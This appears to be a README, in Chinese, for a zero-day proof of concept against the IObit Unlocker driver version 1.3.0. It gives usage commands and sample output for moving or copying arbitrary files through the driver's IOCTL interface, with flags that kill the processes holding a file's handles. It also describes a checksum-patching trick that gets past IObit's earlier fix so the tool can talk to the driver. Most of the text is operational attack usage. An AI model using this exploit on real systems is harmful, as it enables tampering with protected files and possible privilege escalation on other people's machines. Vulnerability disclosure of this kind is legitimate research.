(0 day)移动或复制任意文件。通过校验和技巧绕过之前的补丁。
Writeup:https://nathan2.com/files/iobit.pdf 总体信息:https://nathan2.com/posts/iobit/
我是在不知道已有其他先前漏洞利用的情况下发现此漏洞的。不过,此漏洞绕过了 IObit 所做的补丁。适用于 1.3.0 版本。
用法:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe "C:\copied.txt" "C:\t.txt" 4 1
--- 发送请求 ---
源:C:\copied.txt
目标:C:\t.txt
子类型:4 | 标志:1
IOCTL 成功。驱动程序返回 4 字节。
验证:目标文件存在/可访问。
更多标志:
用法:UnlockerCLI.exe <源路径> <目标路径> <子类型> <标志>
示例:UnlockerCLI.exe "C:\带空格路径\file.txt" "C:\backup\file.txt" 3(子类型) 5(操作标志)
子类型:(至少是我使用的)3=移动,4=复制
操作标志:0=不移除句柄,1=移除句柄,2=终止持有句柄的进程,4=终止进程并移除句柄,5???实验性。
附带的可执行文件应可正常运行且已打补丁。如果不行,请阅读下文。
使用校验和修补程序修补 PoC。操作如下:
C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\checksumpatcher.exe C:\Users\nathan\source\repos\driverhandlerchecker\x64\Release\driverhandlerchecker.exe
原始文件大小:235449 字节
当前交替和:11044471
当前 XOR 和:43
文件已具有正确的校验和。无需更改。
这将允许可执行文件与 IObitUnlocker 驱动程序通信。